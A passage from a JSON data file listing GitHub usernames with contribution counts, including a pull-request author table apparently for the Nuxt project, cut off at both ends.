ivas":1,"DTesch-Reem":1,"dmytro-grablov":1,"brightchip":1,"DouglasAR01":1,"sh-at-cs":1,"orenmizr":1,"JoGlows":1,"Ibz786":1,"SimonSimCity":1,"sky1001":1,"davbtmx":1,"fornazaric":1,"gewisser":1,"mc471066223":1,"Shyam-Chen":1,"abovedave":1,"wowissu":1,"vampics":1,"IvanHirskyy":1,"Andrej492":1,"allusernamestakenexceptthis":1,"HuanVo":1,"binjinbinjinlotus":1,"xiaoxiangxiyu":1,"JenBerry":1,"dihmeetree":1,"nachogarcia":1,"farnabaz":1,"SamyBENYOUB":1,"rczdgbg":1,"johnm1998":1,"piffie":1,"frankcou":1,"mgd216":1,"henningko":1,"jw-star":1,"abdulhadi-lababidi":1,"StevenSK-king":1,"melodyogonna":1,"lloydtao":1,"Z3rio":1,"mebest100":1,"SATHISH099":1,"ddio":1,"lvreninfo":1,"nateemerson":1,"cossssmin":1,"skyLicx":1,"Macrohoo":1,"ozancakir":1,"sangbk208":1,"ghoshRitesh12":1,"shehab267":1,"CyberAP":1,"ahmadqwer":1,"heanfig":1,"Noodlewitt":1,"joelworsham":1,"wuiyang":1,"dodo021":1,"TroyanOlga":1,"capraynor":1,"FireMasterK":1,"abdonrd":1,"PlusA2M":1,"LordEwans":1,"bitmage":1,"bpolaszek":1,"mqyun":1,"patrikbily":1,"JoshuaKGoldberg":1,"KyleXie":1,"b3nten":1,"nicolashmln":1,"KamilBartczak03":1,"iUnknownWs":1,"ThimoDEV":1,"Marvellous111":1,"mhinton":1,"xtance":1,"jvhellemondt":1,"siyecoo":1,"sei-jdshimkoski":1,"mlbonniec":1,"arshcodemod":1,"Ornaldo8":1,"willgan916":1,"codon19":1,"m0k99":1,"li-jingxuan":1,"kernel-picnic":1,"webmaster-dexontechnology":1,"albericobenhur":1,"devcui":1,"xorbis":1,"nicdnepr":1,"aiyay":1,"zavodnyrichard":1,"martinsjek":1,"mad4hit":1,"finn-olekahl":1,"UltraCakeBakery":1,"Samu-14":1,"xbf321":1,"zadumia911":1,"benjamincanac":1,"titusdecali":1,"Akgurban":1,"jervalles":1,"gyofeel":1,"Hrdtr":1,"damienroche":1,"sooooooooooooooooootheby":1,"lynmengmeng":1,"aseidma":1,"foertel":1,"suchorski":1,"sunpm":1,"davision":1,"IvanBernatovic":1,"NozomuIkuta":1,"CodeF53":1,"wiidede":1,"gjfLeo":1,"khopha":1,"0633605918":1,"skypualer":1,"jeffreytung7":1,"agantelin":1,"wf-soft":1,"zhaogongchengsi":1,"JoniLieh":1,"RuslanDimitriuk":1,"g4w3l":1,"TokugawaTakeshi":1,"xbzhang1024":1,"gloompiq":1,"yoohoolai":1,"TeleMediaCC":1,"CharleeWa":1,"cone41":1,"niklas-may":1,"jheng-jie":1,"samairali":1,"vitjaz":1,"zsilbi":1,"areindl":1,"snapwich":1,"Atulin":1,"mlsjla":1,"slidenerd":1,"Fran-AllanSolutions":1,"popadicbranislav":1,"oooFreaKooo":1,"lucashcl":1,"MorevM":1,"manpreet-compro":1,"RahulDey12":1,"zhuyujin001":1,"amplitudesxd":1,"zangetsu02":1,"davidmyersdev":1,"Nirwana3301":1,"biliness":1,"kerim1505k":1,"FloryanFilip":1,"VioletFlare":1,"sfxcode":1,"mwohlan":1,"alexisgaillard43":1,"ch930410":1,"fralonra":1,"inu1255":1,"CircleCode":1,"L422Y":1,"MusixNotMusic":1,"gijsroge":1,"curtisburns":1,"stambekovbera":1,"KirillTregubov":1,"cheike569":1,"dennisadriaans":1,"KaiEi1020":1,"Vijayabhaskar96":1,"qilonelone":1,"bierik":1,"treygrr":1,"silvesterwali":1,"huuhait":1,"RSS1102":1,"Dodobibi":1,"blacksheep107":1,"wodepig":1,"ucw":1,"Sourav9063":1,"ankeycheng":1,"samuelbelo":1,"kovaletsyurii-hue":1,"TurtleKwitty":1,"WygorFonseca":1,"dojo-vue":1,"MCredbear":1,"guakeliao":1,"hungify":1,"passionate-bram":1,"TrungRueta":1,"kouxin":1,"jamols09":1,"cngJo":1,"dtogias":1,"moyukingS":1,"mtdvlpr":1,"kirkwaiblinger":1,"rohrig":1,"ananthachetan":1,"djimnz":1,"zcqno1":1,"LittleSound":1,"manchakkay":1,"xibman":1,"1129zaj":1,"retep0214":1,"langyuxiansheng":1,"Iaicox":1,"TurnerXi":1,"Sandlens":1,"bozicstefan":1,"sweepy84":1,"icedevbug":1,"amine-elghazali":1,"kngai":1,"jesephan":1,"ahmadalnaib":1,"dxvladislavvolkov":1,"kevinhaeni":1,"cameronclaero":1,"timotheduflos":1,"wcywin":1,"arielnmz":1,"wanxe":1,"MoidulHasan":1,"prakhyatgoel":1,"andamansunda":1,"DenFin":1,"aku12138":1,"lixiao258":1,"bme6":1,"S27149":1,"Nomango":1,"ahmedfaical":1,"Minionflo":1,"nbro":1,"3aluw":1,"wvffle":1,"tandler5":1,"bissolli":1,"sxgrant":1,"Techassi":1,"dvelop-jkas":1,"serkon":1,"syczuan":1,"carvalhoms":1,"gregg-cbs":1,"chenzhaozheng":1,"aetherealtech":1,"oritwoen":1,"MAXOUXAX":1,"thekhairul":1,"drowhannn":1,"quietnumeric":1,"Renderthegreat":1,"janschiefer":1,"JoachimR":1,"manik-mmsr":1,"Me-Phew":1,"csnan":1,"kanopa":1,"Spunkie":1,"adamcikado":1,"ivodolenc":1,"leo91000":1,"sebbayer":1,"broXue":1,"Brads3290":1,"flschweiger":1,"skaempfer":1,"krukru":1,"melroy89":1,"nandin-borjigin":1,"Lozoute":1,"HuuNghia2807":1,"CTOHacon":1,"ssr765":1,"Tweniee":1,"ryiot":1,"max5432112345":1,"DogmaZh":1,"Aybee5":1,"preetmishra":1,"Schllimazll":1,"develth":1,"jbreuil":1,"yreenchan":1,"pothuraju-dev":1,"CooLNuanfeng":1,"olivoil":1,"Ranecodes":1,"cbrgpl":1,"Shmi1y":1,"HomWang":1,"eriklindgren":1,"siolfyr":1,"Dimassss":1,"mananchawla2005":1,"clifordpereira":1,"JovanaMatic":1,"Ricky816845":1,"MacjaZival":1,"ahmed-ramzi":1,"samturrell":1,"yuvalkarif":1,"JavierEGonzalez":1,"JianJroh":1,"kumimaru2002":1,"bayramorhan":1,"unicape":1,"mryangsen":1,"iiemos":1,"Striffly":1,"rkfiv":1,"Nevercold":1,"unrevised6419":1,"gervasiuswisely":1,"ubay1":1,"4dr1en":1,"derHodrig":1,"samuelbednarcik":1,"quanzaiyu":1,"shadrqen":1,"kevinmarrec":1,"richtera":1,"mendrinos":1,"aimer-fan":1,"hichem-dahi":1,"Patrick-Remy":1,"wladyslaw-malejew":1,"MartinLednarLedo":1,"codingcn":1,"IfnotFr":1,"wudobi":1,"DannyAndres":1,"beyer-johannes":1,"ambrt":1,"TicheleHayesproton":1,"PeterAlfredLee":1,"trc-mathieu":1,"luacooli":1,"elonehoo":1,"alexanderhorner":1,"matrunchyk":1,"oneWaveAdrian":1,"a6iyyu":1,"KitsuneKenshi":1,"justinwride":1,"cpaczek":1,"shayandrg":1,"Azimaet":1,"romanrozinov":1,"homersimpsons":1,"87xie":1,"mokurofuzo":1,"PoloLacoste":1,"DreaMinder":1,"scmmishra":1,"343058360":1,"iamlaristo":1,"voxspox":1,"aparajita":1,"luhao514":1,"pmnzt":1,"Feng-Fred":1,"freezyh":1,"integration-center":1,"Aleroms":1,"luxkyluke":1,"sultondev":1,"nickelnext":1,"nikolayvn":1,"tylik1":1,"milanblasko28":1,"drblsoft":1,"RyamBaCo":1,"phivk":1,"dl-ias":1,"ptdev":1,"mukundshah":1,"MHillier98":1,"RahelSiddiqi":1,"NelminDev":1,"whoisarjen":1,"machinesily":1,"Soviut":1,"tilenpirih":1,"condorheroblog":1,"linuxmobile":1,"minimusubi":1,"gerkereitz":1,"ziaadini":1,"razmatinyan":1,"rubenRP":1,"ulysse-lacour":1,"aquerol2":1,"sppmstar":1,"pitcher-maarten":1,"mohsin":1,"m2io":1,"hoanghiep1x0":1,"zhanyuzhang":1,"zzpmaster":1,"1059431281":1,"Isotonic":1,"epasch":1,"mirikqq":1,"angh0r":1,"natl-set":1,"bobby169":1,"jakubfiala":1,"mcfarljw":1,"roonie007":1,"everyx":1,"JulienDecruydt":1,"umar13893":1,"TenshiGoan":1,"TaQuanMinhLong":1,"denys119":1,"parlay96":1,"jasonkhanlar":1,"parigi-n":1,"sriram-500apps":1,"kedniko":1,"Ali-Programmer76":1,"Mil-sim":1,"trylovetom":1,"thomaspaillot":1,"p1pchenk0":1,"getshcc":1,"gabrielduete":1,"jonathan-martz":1,"IakobMirotadze":1,"sir-kain":1,"LorisBaeriswyl":1,"BenWaNH":1,"marccremer":1,"andrescellini":1,"22Crusader":1,"mathijsfr":1,"Mingcomity":1,"irm4nt45":1,"datamoeras":1,"Lyokolux":1,"imnash21":1,"KarelVendla":1,"mike-kramer":1,"Youhan":1,"IonCodetec":1,"GhostvOne":1,"Laura10196":1,"marcelobotega":1,"malkhuzayyim":1,"weilengdezaoshang":1,"GITleonine1989":1,"arb85":1,"slps970093":1,"shivanshtalwar0":1,"nogolang":1,"Createitv":1,"StaymanHou":1,"carsonbird":1,"jensentaipei":1,"hugo-lovighi":1,"MattFaz":1,"SirMishaa":1,"devbinyameen":1,"Tanvir-rahman":1,"TheColorman":1,"alm43":1,"OlivierCoq":1,"robert-hoffmann":1,"ciao-chung":1,"flvffywvffy":1,"semibroiled":1,"yan-yanishevsky":1,"BluesYoung-web":1,"ilrein":1,"studentofcoding":1,"Promiseify":1,"blazmrak":1,"TribeWeb":1,"ElliotThiebaut":1,"floriankapaun":1,"FliPPeDround":1,"lfazliev":1,"themathmagician":1,"thibaut-boudier":1,"vionijannet":1,"zukreindev":1,"1nusah":1,"HaishengLiang":1,"aastrum":1,"maartenvanhunsel":1,"GuYun-D":1,"ceferrari":1,"timothymarois":1,"dev-cetus":1,"padarom":1,"owlnai":1,"wwwtony5488":1,"iangriggs":1,"mybearworld":1,"jezzar042015":1,"kiss-keray":1,"iksiecbi740":1,"mvrlin":1,"nitesh-dev":1,"0youri":1,"Attacler":1,"ivan-angjelkoski":1,"kamontat":1,"preshitd":1,"who-jonson":1,"eunjae-lee":1,"iam-robi":1,"sebastiandotdev":1,"lawetis":1,"Kazu0929":1,"Vicnovais":1,"SamEdwardes":1,"evanlong0803":1,"patrickteivas":1,"shaunnbarron":1,"OOWhereAreYou":1,"Smart-Ace-Designs":1,"kreejzak":1,"michael42":1,"PMLS3":1,"Jebediah-Hang":1,"InvixGG":1,"sakurawaifu":1,"Donny2333":1,"Teages":1,"ajones-ifthen":1,"UlugbekNG":1,"BogdanPirozhok":1,"data-diego":1,"nhj7":1,"KelpyCode":1,"bastienrossi":1,"William-WFC":1,"PedroD":1,"Guito":1,"sepZeng":1,"mdotme":1,"SomeoneIsWorking":1,"RuoFeng2015":1,"iamdagy":1,"uniqualitech":1,"sinansalih":1,"gytis-hostinger":1,"brandonwood98":1,"misurito":1,"anton-chernianu":1,"alekseyf":1,"dervondenbergen":1,"one-222333":1,"mickaelchanrion":1,"mmclofe":1,"DiscreteTom":1,"rettrich":1,"tkjaergaard":1,"nevil2":1,"alanbosco":1,"piyush-multiplexer":1,"chuntaoXu":1,"srtonz":1,"yannbertrand":1,"shaiallseated":1,"smkoak":1,"Diizzayy":1,"kuhma":1,"bhagvanp":1,"uuf6429":1,"chika3742":1,"exophunk":1,"xjeventures":1,"Evobaso-J":1,"fcristaldi":1,"j4tmr":1,"gregorvoinov":1,"uistudio-de":1,"SiddhantSharma575":1,"rileyphoenixbytes":1,"far310":1,"lucasboh":1,"qoo1476":1,"JakiChen":1,"ZZXM":1,"Tonysmark":1,"maxiosigma":1,"iotron":1,"clemcode":1,"HuberTRoy":1,"AWBroch":1,"markglattback":1,"ChrisBellew":1,"busybox11":1,"KellsWorks":1,"yazdanqm":1,"Posoroko":1,"mathieunicolas":1,"ADBrusov-SERPTOP":1,"salamanderin45":1,"adamchipperfield":1,"IqroNegoro":1,"tutorialcode":1,"Iamdyy":1,"odranoelBR":1,"Tristan971":1,"feelixe":1,"yannhodiesne":1,"Skyost":1,"tomleo":1,"HalfBloody":1,"nichtdiebohnehamburg":1,"lr-byte":1,"devilmark84":1,"zhonguanping":1,"sbruegel":1,"dan-sarich":1,"DharmarajX24":1,"Arcane6":1,"euoia":1,"Vinccool96":1,"davidmeirlevy":1,"JESUMH":1,"Cherry-qin":1,"silgon":1,"beschneider":1,"LucaArgentieri":1,"caikan":1,"LeonardoRick":1,"privatenumber":1,"lcnoobmystery":1,"tomek-ch":1,"pronode":1,"Maiveasna":1,"kouroshtajalliepour":1,"shunnNet":1,"kurashina-design":1,"nort3x":1,"ExEr7um":1,"rijenkii":1,"stone-zeng":1,"emiliobondioli":1,"ramsonu":1,"alexiokay":1,"thunder87":1,"kewinzaq1":1,"garyo":1,"ilyazolotarov":1,"leopradac":1,"lmc3s3f0r":1,"zxwild":1,"TusharRoy23":1,"tdeea":1,"xollaborator":1,"Fenish":1,"MatteoGabriele":1,"igor9silva":1,"Sford4":1,"j-hannah":1,"renatomattos2912":1,"Lucas-lululu":1,"vanling":1,"fouteox":1,"grbd":1,"otomad":1,"svk-man":1,"jh0ker":1,"stefbowerman":1,"art-boer":1,"qyn980427":1,"Jeffrieh":1,"tanhao8":1,"robertpatrick":1,"Vanger888":1,"277584579":1,"hoachnt":1,"ThomasGysemans":1,"Kyowdem":1,"sgc-fireball":1,"nasirDoe":1,"JasonGotGithub":1,"iMasoud":1,"little3201":1,"ffixitt":1,"jangdamaxdev":1,"SeyyedKhandon":1,"hdw0504":1,"ah-dc":1,"tungvtdigidinos":1,"Racusthor":1,"yezus122":1,"jkkk125":1,"schplitt":1,"leolb-aphp":1,"joni1802":1,"patrikwalker":1,"aliftaufik":1,"HugeLetters":1,"jan-johansson-mr":1,"jmarshall9120":1,"git-e-001":1,"ace9527x":1,"hyvyys":1,"jasonsrogers":1,"set5u":1,"goat865":1,"ThaDaVos":1,"gogochiken":1,"craigharman":1,"mkarras":1,"feixue-tech":1,"lewebsimple":1,"JuoJuo":1,"doseofted":1,"Amar-Gill":1,"x-tropy":1,"TheTimewaster":1,"riderx":1,"esoubiran-aneo":1,"lt-tim":1,"Leni-Vienne":1,"olennardo":1,"miquelromero":1,"daniil4udo":1,"Der-Alex":1,"shahabbasian":1,"Anoesj":1,"zeronerorgb":1,"jay8t6":1,"radislaw":1,"KOFI-GYIMAH":1,"giticon":1,"basemwewebit":1,"sherlockmac":1,"alexMugen":1,"josselinonduty":1,"shopeelike":1,"riddla":1,"lhlyu":1,"HorseNewBee":1,"shareefhadid":1,"2536629322":1,"WillRy":1,"Lanayx":1,"mesoul2024":1,"CCEJaye":1,"tranthanhbinh2603":1,"TomerActionItem":1,"LeVoMihalcea":1,"galaxy-s10":1,"drevantonder":1,"DoHe":1,"stephen-tribefibre":1,"marcbejar":1,"Kamilcat":1,"farshidrezaei":1,"ablaszkiewicz":1,"thewebbeckons":1,"Rocket-Fish":1,"moe-abbasi":1,"ivanmaxlogiudice":1,"aslbekkucharov":1,"okwinwin":1,"jopandey":1,"nishant-compro":1,"tirojal":1,"emechpi":1,"JasonLandbridge":1,"dan-hale":1,"fareed13":1,"hamonCordova":1,"a7med-hussien":1,"willempie96":1,"Gumper-x":1,"tobiasdcl":1,"J43fura":1,"altpoint":1,"7iomka":1,"JakuninOleg":1,"memic84":1,"edsonfervo16mx":1,"piotr-skowronski-rmtcfm-com":1,"zhangmo8":1,"justinkekeocha":1,"tebaly":1,"wenmigwang":1,"fogil":1,"julian-printemps":1,"daft-panda":1,"ryanechternacht":1,"weotch":1,"lukszy":1,"clopezpro":1,"sefacndmr01":1,"victor-ponamariov":1,"wscart":1,"chrisfoss1":1,"BKOHelix":1,"whoisnaisu":1,"Alexandros23Kazantzidis":1,"dschonholtz":1,"artokhotnikov":1,"topdevhere623":1,"17630966776":1,"Planitron":1,"so1ve":1,"atoka-tech":1,"sylic":1,"sabasayer":1,"dondon1202":1,"toddeTV":1,"ToMattBan":1,"JeffreyTan1":1,"gritworks":1,"theflyingape":1,"justsl":1,"xunzhaotech":1,"JulianMar":1,"RaminderPaulSingh":1,"xiaochuan1719":1,"nekdolan":1,"m4rvr":1,"JulienVanelian":1,"kirkbushell":1,"eevho":1,"kecoma1":1,"HADB":1,"Necrometal":1,"sondh0127":1,"isgleb":1,"haexhub":1,"DaniFoldi":1,"nimahkh":1,"yuiyideyui":1,"mme-htkw":1,"izrin96":1,"beowoolf":1,"anjali89r":1,"kane-mason":1,"d-low":1,"misstarn":1,"188229624":1,"Mitschiro":1,"Kai-ros":1,"XpPort":1,"robmoredev":1,"WailanTirajoh":1,"damchap":1,"wangzhe13555313322":1,"ooahz":1,"brian076269":1,"johannes-wtfoxtrot":1,"gkurl":1,"maciej-jezierski":1,"lMatthew8":1,"holwech":1,"holloway":1,"Reekraimareeh":1,"AbdouEsi":1,"TimSusa":1,"Voltra":1,"s00d":1,"chenhan19":1,"maximilian-schwarz":1,"welldonexing":1,"settery":1,"WolfgangDrescher":1,"dimakriper":1,"ccobham":1,"sadducean":1,"Quasarman":1,"JoftheV":1,"stj8888":1,"o1y":1,"markbrouch":1,"ldursw":1,"jasonlundien":1,"tefanhhh":1,"intuitiveminds":1,"xiaoyaoyaoGitHub":1,"McSego1990":1,"jovanmaric":1,"AaronDewes":1,"mirsella":1,"Erilan":1,"BlackoutGG":1,"lewis999bits":1,"harunari0928":1,"nhh":1,"xupapa":1,"huangyan321":1,"Hecatron":1,"marckevinflores":1,"dxhuii":1,"tarunmangukiya":1,"lucassimines":1,"KoujiSano":1,"mohammad-ashrafi2020":1,"sebastian-garciaa":1,"TaeSeungRyu":1,"sahaAcat":1,"keuller":1,"abbas-91":1,"Blemming":1,"Nyanng":1,"GitRowin":1,"ssaneemf":1,"Vahagn-Zaqaryan":1,"Koshux":1,"spocock":1,"BapRx":1,"AlansCodeLog":1,"oliver139":1,"flav-code":1,"bilal-grayphite":1,"safakdinc":1,"artfoor123":1,"anhthang":1,"dev23jjl":1,"dgxo":1,"MrEraxd":1,"shenxing09":1,"Pajicc":1,"moqi-y":1,"sagardspeed2":1,"Noorani-MM":1,"stufffancy":1,"Croodo":1,"chrisbarry":1,"michaelpumo":1,"younglbj":1,"soluationsign":1,"daniloribeiro00":1,"Subin-Qreative":1,"SzymonLisowiec":1,"umamichi":1,"Noxdor":1,"TJ-strange":1,"AutoOrganize":1,"MichaelRoosz":1,"hasan-ozbey":1,"alphajn":1,"peterbud":1,"noriyuki-shimizu":1,"daviddomkar":1,"arnestaphorsius":1,"recallwei":1,"Frallen":1,"rafifn":1,"cpreston321":1,"johan-Rm":1,"loicmaes":1,"Proxx07":1,"SunjieZhu":1,"kav3":1,"KahrLu":1,"bastian-friedrich":1,"henrikaskj":1,"Applelo":1,"despatates":1,"ehibes":1,"zhuc-boy":1,"scalemaildev":1,"anburocky3":1,"onuriltan":1,"mertgundoganx":1,"wtagain":1,"hoSaMShoukry":1,"remonke":1,"lansi951":1,"njoswald":1,"michaelmcandrew":1,"JulienHenrotin":1,"nd2024":1,"AnotiaWang":1,"petitkriket":1,"RollingTL":1,"drekembe":1,"Golong-me":1,"lambda0xff":1,"aarjeli":1,"quantix-dev":1,"AndronKarp":1,"sdr0x07b6":1,"Ky6uk":1,"makaraman":1,"niubaobaozsy":1,"RadBe":1,"leifmarcus":1,"igbominadeveloper":1,"saykeed-shuttlers":1,"Strift":1,"Kobee1203":1,"therealokoro":1,"MarcTroll":1,"mbledkowski":1,"usu":1,"codeblockhead":1,"pkmco":1,"arek125":1,"BitRayDev":1,"jwahdatehagh":1,"chengzhuo5":1,"youlang":1,"zouyn":1,"yyt-do":1,"kusiu":1,"nikitaWebApps":1,"hyperbotauthor":1,"JimJiraffe":1,"baba990aini":1,"svenit":1,"yangyixuan":1,"jonatanvm":1,"dark-noob83":1,"xhemj":1,"WZY1999428":1,"daniser":1,"stavros-tsioulis":1,"Azurency":1,"LQS5858":1,"mojjjtaba":1,"LiuYuYang01":1,"gsperk":1,"wslxm":1,"boogie-ben":1,"iWatchYouFromAfar":1,"acche":1,"scottcarlton":1,"NaMoCv":1,"FelipeO16":1,"g1eny0ung":1,"loilo":1,"chiaraani":1,"ItsmeMing":1,"wtpalexander":1,"parzychu":1,"doantu05150":1,"kosukemori":1,"sebalaini":1,"EddyDezuraud":1,"Sovai":1,"kazazes":1,"achenieux-eyein":1,"wsh4089":1,"jawnothin":1,"roseyda":1,"abdaldeen":1,"lukascorr":1,"abernh":1,"InerkyJad":1,"k-karen":1,"andreev-nikita":1,"aavrug":1,"edisonlsm":1,"SedanaYoga":1,"NH-Limon":1,"saadrhiri":1,"Foresteam":1,"HugoRCD":1,"aaharu":1,"wintsa123":1,"sbastias":1,"awronski":1,"filrak":1,"hashimkalam":1,"saifobeidat":1,"marvelefe":1,"M-weiwei":1,"jesus4497":1,"luis-agm":1,"emdede":1,"hutchic":1,"martijnhalekor":1,"CoronaAustralis":1,"LengYXin":1,"Ilmion":1,"putrafajarh":1,"editcue":1,"Tengxu666":1,"RizkiNfs":1,"toknT":1,"ptylek":1,"robinbeatty":1,"DeepKumbhare85":1,"Hoan-Duong":1,"xiuxiumomo":1,"matthijsch":1,"mmis1000":1,"l4dybird":1,"BlackYuzia":1,"alijaya":1,"woodbrettm":1,"namu-theseed":1,"gnehs":1,"menghany":1,"Ryuka25":1,"MarkusTratschitt":1,"at0mic-l1mbo":1,"guillaumeduliscouet":1,"ddavisj":1,"liyoung1874":1,"lucpotage":1,"rockfang":1,"clasterA":1,"mezoo-adel":1,"alexzhang1030":1,"Ni55aN":1,"kgrosvenor":1,"marianaibarra":1,"terion-name":1,"robmontesinos":1,"kaiunido":1,"e-tho":1,"digitdash":1,"kdivan":1,"magicandskill":1,"paulcrussell":1,"hikaruworld":1,"thespider911":1,"Celtech":1,"Warinyourself":1,"CodyBontecou":1,"viniciuspinatti":1,"damien-hl":1,"titouandk":1,"b-mounir-dev":1,"ash-p-uk":1,"echocage123":1,"Sara2009":1,"xieyhn":1,"BinaryGeometry":1,"Ibochkarev":1,"toyi":1,"Ambrise":1,"jedihugo":1,"timb-103":1,"josvanos":1,"Marian-Calin-Stroescu-Fiskars":1,"Hastatus12":1,"Ahmed-Assaf":1,"chenweiyi":1,"BrankoKrstic":1,"Norbiros":1,"Tu1231":1,"YousafCityscape":1,"ch19105":1,"pan93412":1,"mubaidr":1,"PurpleDevIO":1,"luxterful":1,"Busayor2020":1,"krmao":1,"tareq-abdelwhap":1,"felixdenoix":1,"Beiluola":1,"martiliones":1,"tchin25":1,"frederik-uni":1,"M-Barari":1,"wattanx":1,"Martin-Schlodinski":1,"xss":1,"VesterDe":1,"vuthanhbayit":1,"wtlgo":1,"TechAkayy":1,"carolin-violet":1,"MaximLitvinovZenni":1,"rsm23":1,"danielkellyio":1,"xdkaka":1,"jeanpierrecarvalho":1,"Artem-Schander":1,"lubomirblazekcz":1,"PReynaud":1,"MilkoEmanuilov":1,"sarayourfriend":1,"msdsk":1,"bndrmrtn":1,"theathleticnerd":1,"a992964603":1,"kyejune":1,"amm834":1,"swissmexxa":1,"InvincibleJun":1,"rrd108":1,"5knnbdwm":1,"arkhamvm":1,"zengRRR":1,"shivamp-argus":1,"daehyun-thevc":1,"majoflosa":1,"weeuwee":1,"jinusean":1,"lacorde":1,"AQMpolyface":1,"unluckynelson":1,"marekbuxobucek":1,"n4an":1,"nurdism":1,"adriencaccia":1,"anderslutzhoft":1,"index-js":1,"cedricwe":1,"exrem":1,"yromeroImed":1,"5cube":1,"WilcoBakker":1,"SuleymanQ":1,"vientorepublic":1,"zerosdev":1,"zlinst":1,"Sofitt":1,"ks-neerajn":1,"peter-wu578":1,"MrGllitch":1,"mfreeman451":1,"KillerJulian":1,"danny007in":1,"Cryszon":1,"AO-IO":1,"michaelzangl":1,"select-good-way":1,"zabavnikov":1,"shdow-monarch":1,"jackmahoney":1,"Kalogeros95":1,"aaronransley":1,"rfried":1,"oussamalkd":1,"VisualEhrmanntraut":1,"shadowaun":1,"mario-neuhold":1,"romain-gilles-360":1,"gvanto":1,"TheRoccoB":1,"NguyenDuyHieu987":1,"yyyanghj":1,"jhfoo":1,"popescuandrei9mai":1,"GaborTorma":1,"leogenot":1,"webrsb":1,"crutch12":1,"keiches":1,"jcollazosmarino":1,"rabbitfufu":1,"SolidPXL":1,"gurpindersinghgill":1,"davidschubert":1,"mzenz":1,"BocaiheDabaicai":1,"hslee2008":1,"TodepAdeo":1,"TenkoSpirit":1,"mamiksik":1,"itm-ape":1,"Joery-M":1,"neilmispelaar":1,"edwinfadul":1,"Ibrahimmousa1999":1,"wdittmer-jumbo":1,"arshx86":1,"zoellner":1,"Komputerchik":1,"daniellacosse":1,"artifex-pro":1,"rcerljenko":1,"lafllamme":1,"PierreSchwang":1,"yi-boide":1,"folson-csi":1,"gsabater":1,"floflock":1,"Mhamadkadiry":1,"WonderBerry":1,"berkansivri":1,"reinisp":1,"klwfwdk":1,"fisher60":1,"VladislavYakonyuk":1,"lviardcretat":1,"Theo-Rige":1,"KevinCarnaille2":1,"Shratterjack":1,"gsqrt2":1,"Rhin0cer0s2022":1,"imrim12":1,"alireza2281":1,"irsyaadbp":1,"borodadada":1,"kevinlonigro":1,"piotr-f6s":1,"ronannnn":1,"hachmeister":1,"endquote":1,"samedkucuk":1,"arashsheyda":1,"ditthkr":1,"ni-marchuk":1,"lkrombeen":1,"felixrydberg":1,"tetz2442":1,"Holiden":1,"asonnleitner":1,"toptal0212":1,"peterkimzz":1,"516310460":1,"oneminch":1,"Joelingio":1,"admg":1,"neneodonkor":1,"adnanafzal565":1,"Thebrightmooncrisscross":1,"gcom-ryan":1,"Foddy":1,"idflood":1,"danielrentz":1,"hankdetank":1,"imphil":1,"olinox14":1,"Lionad-Morotar":1,"mavyfaby":1,"VovaStelmashchuk":1,"weiquanju":1,"shilo123":1,"MooseSaeed":1,"jfbloom22":1,"Yugendiran28":1,"superstoffer":1,"lookis":1,"HuakunShen":1,"hakimov-dev":1,"johnson0903-click":1,"eng-gabrielscardoso":1,"DaniGTA":1,"jameszhanc":1,"yodeyer":1,"dany68":1,"trydofor":1,"Floppy012":1,"henk23":1,"DarshGupta16":1,"DanteZZ":1,"dalbodeule":1,"rmeira":1,"smallma":1,"Rock070":1,"yugal-compro":1,"luis-amarquez":1,"AleksandrKrokis":1,"sreuss":1,"aveliino88":1,"Sandros94":1,"vadimbalakhanov":1,"hereiscasio":1,"MrAnyx":1,"okydk":1,"fkammer":1,"DRoet":1,"Hossara":1,"akan":1,"Hub-yang":1,"zhangxu810":1,"Dsaquel":1,"michael-pfister":1,"BakoviDagi":1,"silencerspirit":1,"suzukey":1,"zjf710":1,"znonthedev":1,"Tumulte":1,"darylteo":1,"Aroshold":1,"mehdirayan":1,"shinynet":1,"LMchensir":1,"ashleynolan":1,"krishfredrick":1,"GalV8":1,"BeraSenol":1,"sunzw5236":1,"romanhrynevych":1,"ilijanovic":1,"PerryM123":1,"bgrand-ch":1,"7ochem":1,"devzakir":1,"youngcadam":1,"antoinezanardi":1,"chrisjansky":1}},"pull_request_authors":{"table":{"renovate[bot]":2807,"danielroe":1210,"huang-julien":321,"github-actions[bot]":155,"Mini-ghost":115,"xjccc":95,"DamianGlowala":90,"iiio2":82,"BobbieGoede":62,"antfu":60,"GalacticHypernova":59,"harlan-zw":50,"OrbisK":42,"manniL":39,"userquin":35,"cernymatej":35,"pi0":32,"maximepvrt":31,"wattanx":30,"moshetanzer":24,"luc122c":18,"TheAlexLichter":18,"HigherOrderLogic":18,"KazariEX":17,"ineshbose":17,"Saeid-Za":17,"atinux":17,"onmax":14,"productdevbook":13,"Tanvir-rahman":13,"typed-sigterm":12,"Atinux":12,"CernyMatej":12,"danielkellyio":11,"94726":10,"nicolaspayot":10,"enkot":10,"Hebilicious":10,"clemcode":9,"dependabot[bot]":9,"adamdehaven":9,"daniluk4000":9,"cybercoder-naj":8,"ikxin":8,"Lehoczky":8,"Ibochkarev":8,"jakubednar":8,"hendrikheil":8,"martinszeltins":8,"cjpearson":8,"sapphi-red":7,"Gwynerva":7,"becem-gharbi":7,"Aareksio":7,"lihbr":7,"wilsonpinto":7,"1411430556":6,"warflash":6,"Baroshem":6,"posva":6,"lorenzofiamingo":6,"MikeBellika":6,"RyanClementsHax":6,"romhml":6,"shinGangan":6,"Anoesj":6,"murshex":6,"horvbalint":6,"flashdesignory":6,"Kamsou":6,"lazercaveman":6,"Akryum":5,"hywax":5,"jd-solanki":5,"gjssss":5,"mateuszkulpa":5,"AndreyYolkin":5,"TechGenius7777":5,"izzygld":5,"rexhent":5,"HugoRCD":5,"logotip4ik":5,"gianlucadifrancesco":4,"b0ul17":4,"bargel":4,"jdbdnz":4,"tresko":4,"Yizack":4,"blowsie":4,"sadeghbarati":4,"Norbiros":4,"Flo0806":4,"Archetipo95":4,"Barbapapazes":4,"MooseSaeed":4,"or2e":4,"danielrentz":4,"bernhardberger":4,"RedYetiDev":4,"xanderbarkhatov":4,"tillsanders":4,"lirantal":4,"imslepov":4,"mukundshah":4,"niklas-wortmann":4,"trdln":4,"idorenyinudoh":4,"cljamal":4,"jongmin4943":4,"djixadin":4,"adam-hudak":4,"Kolobok12309":4,"morehawes":4,"justsl":4,"bjoaquinc":4,"ThimoDEV":4,"Smef":4,"arshcodemod":4,"michalzaq12":4,"CodeMan62":4,"BubbleSortt":4,"oumarbarry":4,"yassilah":4,"RokeAlvo":4,"tobiasdiez":4,"santiagoaloi":4,"edwinfadul":4,"davidstackio":4,"ExEr7um":4,"vacijj":3,"peterbud":3,"markthree":3,"IsraelOrtuno":3,"boogie-ben":3,"franklin-tina":3,"leopoldkristjansson":3,"unguul":3,"